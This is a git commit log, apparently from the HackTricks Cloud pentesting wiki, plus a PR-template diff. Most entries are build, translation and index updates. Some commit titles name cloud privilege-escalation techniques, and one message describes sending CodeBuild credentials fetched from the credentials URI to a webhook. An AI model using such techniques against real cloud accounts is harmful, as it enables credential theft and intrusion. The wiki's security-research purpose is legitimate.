d9b93c0df5 Update searchindex 2025-03-21 09:04:21 +00:00
SirBroccoli
62ee9ee386 Merge pull request #170 from cydtseng/minor
Minor improvements for aws-basic-information
2025-03-21 09:59:00 +01:00
SirBroccoli
1c761c2a55 Merge pull request #169 from JaimePolop/patch-23
Update az-sql.md
2025-03-21 09:58:34 +01:00
Build master
849a545f21 Update searchindex 2025-03-18 05:49:00 +00:00
Carlos Polop
cfc01c0374 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-18 06:47:31 +01:00
Carlos Polop
6915cfa68c fix 2025-03-18 06:47:26 +01:00
Build master
aed8d2e643 Update searchindex 2025-03-17 11:56:39 +00:00
Carlos Polop
b2bf4d9b07 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-17 12:55:07 +01:00
Carlos Polop
6788b5e0a5 asd 2025-03-17 12:55:00 +01:00
Build master
5c702e69b9 Update searchindex 2025-03-17 03:49:36 +00:00
Carlos Polop
42f78679a2 vm to aa 2025-03-17 04:47:59 +01:00
Cyd Tseng
6c40f6cac4 docs: minor grammar / spelling improvements for aws-basic-information 2025-03-13 00:38:23 +08:00
Jaime Polop
fcb6c989fc Update az-sql.md 2025-03-07 19:29:40 +01:00
Jaime Polop
8d310c43f5 Update az-sql.md 2025-03-07 19:28:42 +01:00
Build master
27d96d81e1 Update searchindex 2025-03-04 22:09:14 +00:00
Carlos Polop
6d88cb548f impr 2025-03-04 23:07:33 +01:00
Build master
1216308b18 Update searchindex 2025-03-02 12:55:20 +00:00
Carlos Polop
00f4a32ae3 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-02 13:53:42 +01:00
Carlos Polop
96579673c1 sentinel 2025-03-02 13:53:38 +01:00
Build master
f8c4c4d8ac Update searchindex 2025-03-02 00:21:20 +00:00
Carlos Polop
3902e8cafd Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-02 01:19:46 +01:00
Carlos Polop
39876cd315 defender + monitoring 2025-03-02 01:19:42 +01:00
Build master
d668cf5452 Update searchindex 2025-02-26 15:52:26 +00:00
Carlos Polop
d54cb2b5ff virtual desktops 2025-02-26 16:50:45 +01:00
Carlos Polop
c79c359fd2 asd 2025-02-26 02:00:25 +01:00
Carlos Polop
1efe5e7e77 asd 2025-02-26 01:40:13 +01:00
Carlos Polop
7991ff4fae asd 2025-02-26 01:19:35 +01:00
Carlos Polop
045b6c2320 asd 2025-02-26 00:38:39 +01:00
Carlos Polop
ab888d748c asd 2025-02-26 00:32:20 +01:00
Carlos Polop
5d3c7b0348 asd 2025-02-26 00:14:56 +01:00
Carlos Polop
d77d87d686 a 2025-02-25 23:37:57 +01:00
Carlos Polop
9c0cfb6529 a 2025-02-25 23:33:09 +01:00
Carlos Polop
2730856acc a 2025-02-25 23:29:26 +01:00
Carlos Polop
221636beae Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-25 23:07:12 +01:00
Carlos Polop
740801ab61 a 2025-02-25 23:07:08 +01:00
Build master
23ce7a243e Update searchindex 2025-02-25 21:58:00 +00:00
SirBroccoli
13f89a6674 Merge pull request #168 from JaimePolop/master
vitualdesktop
2025-02-25 22:56:31 +01:00
Jimmy
776d9f73df vitualdesktop 2025-02-25 12:41:45 +01:00
Jimmy
c8c09b0abb vitualdesktop 2025-02-25 12:37:08 +01:00
Build master
329ef07c7e Update searchindex 2025-02-25 05:08:47 +00:00
Carlos Polop
aad012f215 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-25 06:06:50 +01:00
Carlos Polop
50029a6488 logic apps 2025-02-25 06:06:45 +01:00
Build master
5bb4e02a58 Update searchindex 2025-02-24 10:29:46 +00:00
Carlos Polop
c0a3872982 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-24 11:27:05 +01:00
Carlos Polop
a19517f026 az functions 2025-02-24 11:27:01 +01:00
Build master
429913c5ec Update searchindex 2025-02-22 16:14:23 +00:00
Carlos Polop
2d32b37d9c Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-22 17:12:56 +01:00
Carlos Polop
77da1e58ca static web apps 2025-02-22 17:12:53 +01:00
Build master
516553f4bf Update searchindex 2025-02-22 12:46:54 +00:00
SirBroccoli
188b9a7b0a Merge pull request #166 from JaimePolop/master
new
2025-02-22 13:45:25 +01:00
Jimmy
58556acb7d new 2025-02-22 13:38:23 +01:00
Jimmy
0148473b67 new 2025-02-22 13:34:13 +01:00
Jimmy
b832183456 new 2025-02-22 13:27:27 +01:00
Build master
3e96d64e50 Update searchindex 2025-02-21 23:33:51 +00:00
Carlos Polop
7336c976ae Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-22 00:32:13 +01:00
Carlos Polop
def87f1ffb asd 2025-02-22 00:32:09 +01:00
Build master
b715d43fad Update searchindex 2025-02-21 13:57:18 +00:00
Carlos Polop
c6b3795cc5 fix workflows 2025-02-21 14:55:41 +01:00
Carlos Polop
8fa715b08d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-21 12:44:07 +01:00
Carlos Polop
aeb3f8b582 a 2025-02-21 12:44:01 +01:00
Build master
568e936ca0 Update searchindex 2025-02-21 11:02:56 +00:00
Carlos Polop
2456bca341 a 2025-02-21 12:01:31 +01:00
Carlos Polop
f138e0366f Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-21 12:00:43 +01:00
Carlos Polop
c089890c84 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-21 00:14:46 +01:00
Build master
901725b847 Update searchindex 2025-02-20 23:14:18 +00:00
Carlos Polop
fea4bb8938 impr 2025-02-21 00:13:14 +01:00
SirBroccoli
7026e4e728 Merge pull request #163 from JaimePolop/master
Cosmosdb
2025-02-21 00:12:51 +01:00
Jaime Polop
0e15aeffba Delete searchindex.json 2025-02-20 23:21:38 +01:00
Jimmy
b7dc63cd26 a 2025-02-20 23:20:59 +01:00
Build master
4c9c8c10ac Update searchindex 2025-02-20 12:10:09 +00:00
Carlos Polop
64f5661515 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-20 13:08:28 +01:00
Carlos Polop
bee34f3c05 fixes 2025-02-20 13:08:24 +01:00
Build master
2f84f3f328 Update searchindex 2025-02-20 00:56:04 +00:00
Carlos Polop
892232fe26 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-20 01:54:38 +01:00
Carlos Polop
c71aa6f7b1 a 2025-02-20 01:54:29 +01:00
Carlos Polop
ab3e89c82d more sql 2025-02-20 01:53:49 +01:00
Build master
caf320e355 Update searchindex 2025-02-20 00:51:55 +00:00
Carlos Polop
e841f06505 sql and other fixes 2025-02-20 01:50:24 +01:00
Build master
6456eab2cf Update searchindex 2025-02-20 00:36:33 +00:00
SirBroccoli
3c746383c6 Merge pull request #162 from JaimePolop/master
sql & others
2025-02-20 01:35:07 +01:00
Jaime Polop
064162062f Delete searchindex.json 2025-02-20 00:57:18 +01:00
Jimmy
e3ca81040e asd 2025-02-20 00:55:53 +01:00
Build master
4313cc72bc Update searchindex 2025-02-19 01:29:33 +00:00
Carlos Polop
80b91382f3 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-19 02:28:04 +01:00
Carlos Polop
0828130954 az sql 2025-02-19 02:27:59 +01:00
Build master
94e634230a Update searchindex 2025-02-18 11:18:25 +00:00
Carlos Polop
5e48ce18e0 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-18 12:16:45 +01:00
Carlos Polop
61c70bfefd improvements 2025-02-18 12:16:41 +01:00
Build master
ce2ede1e01 Update searchindex 2025-02-17 20:57:20 +00:00
Carlos Polop
127c85e7d2 impr servicebus 2025-02-17 21:55:47 +01:00
Build master
40e08a1893 Update searchindex 2025-02-17 18:27:14 +00:00
Carlos Polop
e746e3e353 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-17 19:25:47 +01:00
Carlos Polop
0f7175eb98 fix 2025-02-17 19:25:37 +01:00
Build master
d109bb6b44 Update searchindex 2025-02-17 18:21:54 +00:00
Carlos Polop
2505aec847 fix build 2025-02-17 19:20:11 +01:00
Carlos Polop
cc5dc4c885 summary update 2025-02-17 18:15:16 +01:00
Carlos Polop
09a10afd24 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-17 18:09:02 +01:00
Carlos Polop
0d9b4e5917 aa persistence 2025-02-17 18:08:59 +01:00
SirBroccoli
ad0fd2ac62 Merge pull request #161 from JaimePolop/master
sql and servicebus
2025-02-17 12:56:22 +01:00
Build master
47c4eb2f02 Update searchindex 2025-02-17 11:52:19 +00:00
Jaime Polop
8b8705f5a2 Delete searchindex.json 2025-02-17 12:51:09 +01:00
Build master
e82c35b07f Update searchindex 2025-02-17 11:49:02 +00:00
Jimmy
5f47797e6a updates 2025-02-17 12:41:24 +01:00
Build master
90a2f79a0f Update searchindex 2025-02-17 10:56:10 +00:00
Carlos Polop
baa1c7240d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-17 11:54:31 +01:00
Carlos Polop
0f6da30192 fix summary 2025-02-17 11:54:27 +01:00
Build master
06d67a4432 Update searchindex 2025-02-16 17:27:19 +00:00
Carlos Polop
f9413e0d34 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-16 18:25:48 +01:00
Carlos Polop
31acbca2ed privesc jobs az 2025-02-16 18:25:44 +01:00
Build master
e938af6965 Update searchindex 2025-02-15 17:50:26 +00:00
Carlos Polop
8d0d445b93 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-15 18:48:59 +01:00
Carlos Polop
9cd2ef8e2f fixes 2025-02-15 18:48:56 +01:00
Build master
c4b06ab12c Update searchindex 2025-02-15 15:25:20 +00:00
Carlos Polop
5537bfe63d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-15 16:23:52 +01:00
Carlos Polop
6e477bc296 update container services az 2025-02-15 16:23:48 +01:00
Build master
46af6b9474 Update searchindex 2025-02-15 03:24:48 +00:00
Carlos Polop
e6644e6caa improvements 2025-02-15 04:23:19 +01:00
Carlos Polop
fcc20e6908 a 2025-02-15 03:00:32 +01:00
Carlos Polop
8be9956703 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-15 02:17:10 +01:00
Carlos Polop
2be77df66d a 2025-02-15 02:17:06 +01:00
Build master
8594fa5343 Update searchindex 2025-02-15 01:16:02 +00:00
SirBroccoli
ba04a6a2ff Merge pull request #158 from raadfhaddad/master
Update aws-macie-privesc.md
2025-02-15 02:14:40 +01:00
Build master
d2f2655fc4 Update searchindex 2025-02-14 18:20:02 +00:00
Carlos Polop
5a5104fe95 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-14 19:18:33 +01:00
Carlos Polop
ef85d7fdd5 unauth container registry 2025-02-14 19:18:28 +01:00
Carlos Polop
83bc9f97e8 f 2025-02-14 17:20:39 +01:00
Build master
d3b9883283 Update searchindex 2025-02-14 16:20:08 +00:00
Carlos Polop
81acaa16e0 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-14 17:18:44 +01:00
Carlos Polop
70d0f13e7e f 2025-02-14 17:18:40 +01:00
Build master
8392cf548c Update searchindex 2025-02-14 15:44:15 +00:00
Carlos Polop
0b97b3caff Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-14 16:42:53 +01:00
Carlos Polop
4df9252db4 fixes 2025-02-14 16:42:49 +01:00
Raad
3350e31738 Update aws-macie-privesc.md 2025-02-14 08:16:32 +01:00
Build master
17be115fa6 Update searchindex 2025-02-13 17:45:51 +00:00
Carlos Polop
ccbbfaee00 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-13 18:44:25 +01:00
Carlos Polop
b98496aaed f 2025-02-13 18:44:21 +01:00
Build master
30399528e4 Update searchindex 2025-02-13 10:01:56 +00:00
Carlos Polop
650655363f Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-13 11:00:31 +01:00
Carlos Polop
615a959bb6 fix macie 2025-02-13 11:00:27 +01:00
Build master
0d198fe961 Update searchindex 2025-02-13 09:54:32 +00:00
SirBroccoli
abbd0a816b Merge pull request #157 from raadfhaddad/master
Create aws-macie-privesc.md
2025-02-13 10:53:03 +01:00
Carlos Polop
13df9aee51 f 2025-02-13 10:51:25 +01:00
Raad
eb110dfd72 Create aws-macie-enum.md 2025-02-12 22:21:39 +01:00
Raad
491627bf9f Merge branch 'HackTricks-wiki:master' into master 2025-02-12 22:18:35 +01:00
Carlos Polop
ca5a9e1037 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-12 18:21:54 +01:00
Carlos Polop
7537334e2c a 2025-02-12 18:21:49 +01:00
Congon4tor
bb664c142d changes serchindex ulrs 2025-02-12 18:06:33 +01:00
Carlos Polop
4eafaed2b1 m 2025-02-12 15:58:21 +01:00
Carlos Polop
e158438a0f master workflow 2025-02-12 15:33:47 +01:00
Carlos Polop
57da0bf8db run gh 2025-02-12 15:25:17 +01:00
Carlos Polop
ae7aefe448 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-12 15:24:14 +01:00
Carlos Polop
19401f19d6 searchindex master 2025-02-12 15:24:09 +01:00
Congon4tor
92b3c384c8 Fix links and update search index url 2025-02-12 14:47:59 +01:00
Carlos Polop
0d26e5ed8c Update searchindex 2025-02-12 14:42:59 +01:00
Carlos Polop
cd5de3879c f 2025-02-12 14:37:24 +01:00
Carlos Polop
dc557dad46 try 2025-02-12 14:32:25 +01:00
Carlos Polop
d6597f9990 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-12 14:31:51 +01:00
Carlos Polop
77a117d772 searchindex test 1 2025-02-12 14:31:47 +01:00
Congon4tor
699a707bb6 Add searchindex to repo 2025-02-12 14:13:04 +01:00
Raad
b741525093 Create aws-macie-privesc.md 2025-02-11 21:46:29 +01:00
Carlos Polop
60b1ca6b88 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-11 17:56:14 +01:00
Carlos Polop
30236714f5 f 2025-02-11 17:56:10 +01:00
SirBroccoli
f258a13eef Merge pull request #156 from JaimePolop/master
FIxes
2025-02-11 00:28:49 +01:00
Carlos Polop
4e491e3f55 fixes 2025-02-11 00:28:34 +01:00
Jimmy
b3cfc40029 Merge branch 'master' of https://github.com/JaimePolop/hacktricks-cloud 2025-02-10 12:44:38 +01:00
Jimmy
26bf439a59 Y 2025-02-10 12:31:51 +01:00
Jimmy
3757efbd43 Y 2025-02-10 12:22:24 +01:00
Carlos Polop
d13ebeaeb5 f 2025-02-10 01:21:01 +01:00
Carlos Polop
3f01e5e4fa f 2025-02-09 18:51:16 +01:00
Carlos Polop
8452766003 fixes 2025-02-09 18:51:11 +01:00
Carlos Polop
9bea483104 fix banner 2025-02-09 15:53:44 +01:00
Carlos Polop
7162236a6b fix 2025-02-08 19:54:20 +01:00
Carlos Polop
f5c7490026 mor einfo 2025-02-08 19:47:32 +01:00
Carlos Polop
2383d6958b Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-08 19:23:46 +01:00
Carlos Polop
fd5fc9957a azure basics 2025-02-08 19:23:41 +01:00
SirBroccoli
d42d244a6a Merge pull request #154 from JaimePolop/patch-22
Update az-storage-privesc.md
2025-02-08 14:46:52 +01:00
Carlos Polop
117bb933af improvements 2025-02-07 01:02:14 +01:00
Carlos Polop
9a9ea3101f typo 2025-02-06 03:12:35 +01:00
Carlos Polop
ec6fcd37f0 impr 2025-02-06 00:34:19 +01:00
Carlos Polop
551524079b Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-02-04 19:06:01 +01:00
Carlos Polop
92d27a9632 add perm Microsoft.ContainerRegistry/registries/generateCredentials/action 2025-02-04 19:05:56 +01:00
Jaime Polop
cfcc836974 Update az-storage-privesc.md 2025-02-03 11:26:08 +01:00
SirBroccoli
7838f68347 Merge pull request #152 from hhoollaa1/master
EFS IP Enumeration Python Script
2025-02-02 19:21:19 +01:00
SirBroccoli
452fb430b3 Merge pull request #153 from JaimePolop/patch-21
Update az-file-shares.md
2025-01-29 12:33:13 +01:00
Jaime Polop
ba94d85a36 Update az-file-shares.md 2025-01-29 12:29:56 +01:00
hhoollaa1
a9b9e95899 Update aws-efs-enum.md 2025-01-27 21:10:05 +01:00
SirBroccoli
5a2543873e Merge pull request #151 from JaimePolop/master
azuread MS Graph
2025-01-27 15:19:11 +01:00
Jaime Polop
b353597cd3 Update az-azuread.md 2025-01-27 11:58:13 +01:00
Jaime Polop
9ed1b29bb9 Update az-azuread.md 2025-01-27 02:10:28 +01:00
Carlos Polop
01295fcd13 dataproc 2025-01-26 22:47:34 +01:00
SirBroccoli
81d2665909 Merge pull request #148 from shamo0/master
grte-shamooo
2025-01-26 22:45:09 +01:00
Mac
873eba38c0 dataproc enum & privesc 2025-01-27 00:14:46 +04:00
Carlos Polop
979ea57c3b Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-26 18:53:28 +01:00
Carlos Polop
ae6616b63b comparison reader with security reader 2025-01-26 18:53:24 +01:00
Mac
dbac949488 dataproc privesc update 2025-01-26 21:53:14 +04:00
Congon4tor
3e06c28e43 updated preprocessor 2025-01-26 18:16:58 +01:00
SirBroccoli
5d21fb67a6 Merge pull request #147 from JaimePolop/master
CloudShell & LogicApps
2025-01-26 16:10:25 +01:00
SirBroccoli
25395ae94a Merge branch 'master' into master 2025-01-26 16:10:16 +01:00
Carlos Polop
626155bec1 small fixes 2025-01-26 16:06:53 +01:00
Carlos Polop
8f02f9f5a5 fix 2025-01-26 15:48:40 +01:00
Carlos Polop
d9c68fcf04 fix 2025-01-26 15:21:37 +01:00
Carlos Polop
c76f3defdd a 2025-01-26 12:02:02 +01:00
Carlos Polop
569f2be7c9 impr 2025-01-26 11:42:59 +01:00
Carlos Polop
416e7cf699 improvements 2025-01-25 15:33:23 +01:00
Mac
480c6ba178 dataproc privesc 2025-01-23 20:54:49 +04:00
Carlos Polop
8f6514eed9 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-23 00:04:03 +01:00
Carlos Polop
6736e6d5c8 more azure stuff 2025-01-23 00:03:36 +01:00
Jaime Polop
1bc1085d79 Update SUMMARY.md 2025-01-22 13:21:20 +01:00
Jaime Polop
50f10aa913 Update az-static-web-apps.md 2025-01-22 13:17:57 +01:00
Jaime Polop
bb6035c0ca Update SUMMARY.md 2025-01-22 13:13:24 +01:00
SirBroccoli
b6310f4ac6 Merge pull request #141 from VL4DYSL4V/VL4DYSL4V-k8s-privesc-via-secrets-create-and-read
Added K8s privesc technique via Create & Read secrets
2025-01-22 13:03:38 +01:00
SirBroccoli
9bcaf7c6df Merge pull request #145 from JaimePolop/patch-20
Update az-cosmosDB.md
2025-01-22 10:49:35 +01:00
SirBroccoli
a60a5be8d2 Merge pull request #142 from VL4DYSL4V/VL4DYSL4V-create-and-delete-k8s-pods-with-curl
Added scripts for creating & deleting K8s pods, SAs, Roles, RoleBindings, and Secrets with curl
2025-01-22 10:49:19 +01:00
Carlos Polop
250329b9aa fix summary 2025-01-21 19:38:49 +01:00
Carlos Polop
64ab139a57 azure automatic tools 2025-01-21 18:15:39 +01:00
Jaime Polop
38ec0650ca Update SUMMARY.md 2025-01-17 17:41:33 +01:00
Jaime Polop
a027dd2a21 Add files via upload 2025-01-17 17:39:20 +01:00
Jaime Polop
1e69b05fe7 Add files via upload 2025-01-17 17:38:57 +01:00
Jaime Polop
9f84500da6 Update SUMMARY.md 2025-01-16 12:49:17 +01:00
Jaime Polop
62664886c7 Add files via upload 2025-01-16 12:47:56 +01:00
Jaime Polop
e4b1066789 Add files via upload 2025-01-16 12:47:24 +01:00
Jaime Polop
0f2e9443ca Add files via upload 2025-01-16 12:46:39 +01:00
Jaime Polop
dbb3f98a12 Update az-cosmosDB.md 2025-01-13 17:03:55 +01:00
Jaime Polop
234398ad6e Merge branch 'HackTricks-wiki:master' into master 2025-01-13 16:39:28 +01:00
Jaime Polop
a6e5b378be Update az-cosmosDB.md 2025-01-13 16:39:17 +01:00
Vladyslav
cdd6583bb6 Update kubernetes-enumeration.md 2025-01-13 15:08:23 +02:00
Vladyslav
12c468f714 Update kubernetes-enumeration.md 2025-01-13 14:58:03 +02:00
Carlos Polop
0996afea1b azure container 2025-01-12 19:42:21 +01:00
Jaime Polop
3fd7b2b8a2 Merge branch 'HackTricks-wiki:master' into master 2025-01-12 11:55:47 +01:00
Jimmy
e47fdfb9ea Update pwsh 2025-01-12 11:55:13 +01:00
SirBroccoli
d6f87481ef Merge pull request #139 from JaimePolop/master
CosmosDB, Postgres and MySQL
2025-01-11 19:28:52 +01:00
Vladyslav
3000c3b4fe Added scripts for creating & deleting K8s pods with curl 2025-01-11 16:42:38 +02:00
Vladyslav
15ce1f2a40 Added K8s privesc technique via Create & Read secrets 2025-01-11 15:20:34 +02:00
Jaime Polop
8ec34fc329 Merge branch 'HackTricks-wiki:master' into master 2025-01-10 18:50:57 +01:00
Jaime Polop
5d6efaa6a6 Update SUMMARY.md 2025-01-10 18:50:36 +01:00
Carlos Polop
73e6fee408 auto acc 2025-01-10 18:39:42 +01:00
Jimmy
833b571498 Update URLs 2025-01-10 16:34:21 +01:00
Jaime Polop
37bf365f5b Merge branch 'HackTricks-wiki:master' into master 2025-01-10 15:02:54 +01:00
Carlos Polop
8b52bc23a3 automation acc hybrid workers 2025-01-10 14:16:44 +01:00
Carlos Polop
d9f6b34673 fix ec2 + automation accounts 2025-01-10 12:59:11 +01:00
Jaime Polop
9021590856 Update SUMMARY.md 2025-01-10 11:32:04 +01:00
Jaime Polop
8ea0f4a3f1 Update az-cosmosDB-post-exploitation.md 2025-01-10 11:28:42 +01:00
Jaime Polop
78334993a2 Update az-cosmosDB.md 2025-01-10 11:26:58 +01:00
Jaime Polop
e8cee6743c Add files via upload 2025-01-10 11:06:35 +01:00
Jaime Polop
55fc400bf7 Add files via upload 2025-01-10 11:02:38 +01:00
Jaime Polop
dc16c9ff9f Add files via upload 2025-01-10 11:01:45 +01:00
Carlos Polop
6d926a6f72 local hacktricks cloud 2025-01-09 18:20:22 +01:00
Carlos Polop
d9a7ae2880 build coker public 2025-01-09 17:59:36 +01:00
Carlos Polop
be659333c8 fix keyvault.md 2025-01-09 17:34:55 +01:00
Carlos Polop
cb67f59e59 images 2025-01-09 17:29:41 +01:00
Carlos Polop
b3f82cc35c fix hacktricks cloud 2025-01-09 15:46:23 +01:00
Carlos Polop
1f00ec798e write packages 2025-01-09 09:50:32 +01:00
Carlos Polop
782d409f47 en 2025-01-09 09:45:51 +01:00
Carlos Polop
30f14affe7 t11 2025-01-09 09:44:48 +01:00
Carlos Polop
65cfe4be40 handle exception 2025-01-09 09:44:32 +01:00
Carlos Polop
39ef4428ef build master 2025-01-09 09:36:04 +01:00
Carlos Polop
de7e5d2eb0 t10 2025-01-09 09:31:45 +01:00
Carlos Polop
78f6ebfdc9 install awscli in the container 2025-01-09 09:19:39 +01:00
Carlos Polop
4b9cb59f09 fr 2025-01-09 09:17:47 +01:00
Carlos Polop
3b671863b3 t9 2025-01-09 09:15:28 +01:00
Carlos Polop
110692ec5f t8 2025-01-09 09:10:14 +01:00
Carlos Polop
065d29019c t7 2025-01-09 09:06:37 +01:00
Carlos Polop
184a36301a translator 2025-01-09 09:04:23 +01:00
Carlos Polop
c3b572db87 t6 2025-01-09 08:43:19 +01:00
Carlos Polop
894d2f8dc6 t5 2025-01-09 08:34:24 +01:00
Carlos Polop
3eff514680 t4 2025-01-09 02:04:38 +01:00
Carlos Polop
4fae1360a8 t3 2025-01-09 01:55:16 +01:00
Carlos Polop
372ccdf299 t2 2025-01-09 01:52:23 +01:00
Carlos Polop
0c3d697d67 t2 2025-01-09 01:52:19 +01:00
Carlos Polop
cdf8430598 t 2025-01-09 01:49:44 +01:00
Carlos Polop
432e916b2f translators 2025-01-09 01:47:16 +01:00
Carlos Polop
cb23139acd d 2025-01-09 01:29:31 +01:00
Carlos Polop
1a41153b95 docker 2025-01-09 01:26:48 +01:00
Carlos Polop
06184f73ec build docker 2025-01-09 01:25:03 +01:00
Carlos Polop
bde9b73eb1 docker 2025-01-09 01:18:30 +01:00
Carlos Polop
69db82891a cat error preprod 2025-01-09 01:05:33 +01:00
Carlos Polop
52142003ec add az-static-web-apps-privesc.md 2025-01-08 23:51:34 +01:00
Carlos Polop
a850e268dc fix transaltor 2025-01-08 23:50:53 +01:00
Carlos Polop
cc120ade68 translate az-app-services-privesc.md 2025-01-08 22:00:23 +01:00
Carlos Polop
3000248da2 fix translator log 2025-01-08 21:59:46 +01:00
SirBroccoli
1a5f666c80 Merge pull request #138 from ex16x41/patch-5
Update aws-codebuild-privesc.md
2025-01-08 21:36:25 +01:00
Eva
95f91529c7 Update aws-codebuild-privesc.md
Create a hook.json file with command to send output from curl credentials URI to your webhook address
2025-01-08 21:27:54 +01:00
Carlos Polop
b65df65002 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-07 00:43:41 +01:00
Carlos Polop
1c333d4cab static web 2025-01-07 00:43:37 +01:00
Congon4tor
b0794c4b1c Support # in refs 2025-01-06 18:02:23 +01:00
Carlos Polop
009ef58e30 static 2025-01-05 23:48:40 +01:00
Carlos Polop
ad6c542f82 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-05 21:15:16 +01:00
Carlos Polop
3a7480d764 MIGRATION TYPOS 2025-01-05 21:15:12 +01:00
SirBroccoli
4b71029629 Merge pull request #134 from offensive-actions/add-terraform-state-rce-and-dynamodb-privesc
arte-administrator
2025-01-05 16:05:38 +01:00
Carlos Polop
c1aee098b6 actas in cloudbuild 2025-01-05 16:03:29 +01:00
Carlos Polop
ec0ff62bcb fix translator 2025-01-05 15:32:32 +01:00
Carlos Polop
2244c6b485 clean images 2025-01-05 15:31:07 +01:00
Carlos Polop
61bc94e77d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-05 11:29:54 +01:00
Carlos Polop
13358c1371 fix links 2025-01-05 11:29:50 +01:00
SirBroccoli
1e29cb77cc Merge pull request #135 from HackTricks-wiki/support-file-downloads
Support file downloads
2025-01-04 18:48:56 +01:00
Carlos Polop
d65983432b app services 2025-01-04 04:38:52 +01:00
Carlos Polop
18d1953edd app services 2025-01-04 01:32:19 +01:00
Carlos Polop
c395861d3d improve translator 2025-01-04 00:25:53 +01:00
Carlos Polop
d9247bf598 app services 2025-01-03 20:16:15 +01:00
Congon4tor
853e602bc2 Support file downloads 2025-01-03 19:35:15 +01:00
Benedikt Haußner
8750a93d41 add dynamodb privilege escalation via putting of resource based policy 2025-01-03 15:26:44 +01:00
Benedikt Haußner
b918609383 add fully working solution for privesc via terraform state file poisoning and reference from s3 privilege escalation to that technique 2025-01-03 15:26:16 +01:00
Carlos Polop
3d1f96fd4a Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-01-03 12:21:56 +01:00
Carlos Polop
9eec79f700 app services 2025-01-03 12:21:52 +01:00
SirBroccoli
8a25a0856f Update translator.py 2025-01-03 11:42:03 +01:00
SirBroccoli
e67cc3f450 Merge pull request #133 from HackTricks-wiki/robots-txt
Add robots.txt
2025-01-03 10:47:48 +01:00
SirBroccoli
194ae6d76b Merge pull request #132 from HackTricks-wiki/add-language-selector
Fixes language UI
2025-01-03 10:47:06 +01:00
Congon4tor
d53ffc12eb Fix page index with links 2025-01-03 03:30:47 +01:00
Congon4tor
c520826284 Add read time to all pages 2025-01-03 02:52:56 +01:00
Congon4tor
7a0a0329a7 Add robots.txt 2025-01-03 01:46:36 +01:00
Congon4tor
a7bf8124da Fixes language UI 2025-01-03 01:09:11 +01:00
Carlos Polop
b340bf8ada t 2025-01-02 22:26:08 +01:00
Carlos Polop
bad627b7db lang 2025-01-02 21:53:56 +01:00
Carlos Polop
96cc8f9772 languages 2025-01-02 21:53:49 +01:00
SirBroccoli
1922e106fd Merge pull request #131 from HackTricks-wiki/add-language-selector
Add language selector
2025-01-02 21:47:43 +01:00
Congon4tor
d7d5e4a93c Add language selector 2025-01-02 21:18:12 +01:00
Carlos Polop
716aa06779 translate 2 2025-01-01 23:55:27 +01:00
Carlos Polop
4ef00e6b1b translate fix 2025-01-01 23:55:17 +01:00
Carlos Polop
2beb8398a6 translate 2 2025-01-01 21:36:26 +01:00
Carlos Polop
d0b9174054 translate 2025-01-01 21:36:15 +01:00
Carlos Polop
d0e6a85e6f update translator 2025-01-01 21:23:33 +01:00
Carlos Polop
d96df379fd trasnlate other half 2024-12-31 18:48:54 +01:00
Carlos Polop
4d622f5500 translate half 2024-12-31 18:48:31 +01:00
709 changed files with 35058 additions and 41996 deletions

View File

@@ -1,12 +1,16 @@
在发送 PR 之前,你可以删除这些内容:
You can remove this content before sending the PR:
## 署名
我们重视你的知识并鼓励你分享内容。请确保你只上传你拥有或已获得原作者许可分享的内容(在新增文本中或在你修改页面的末尾添加对作者的引用,或两者同时添加)。你对知识产权的尊重有助于为所有人营造一个可信且合法的共享环境。
## Attribution
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
## HackTricks Training
If you are adding so you can pass the in the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-<username>`.
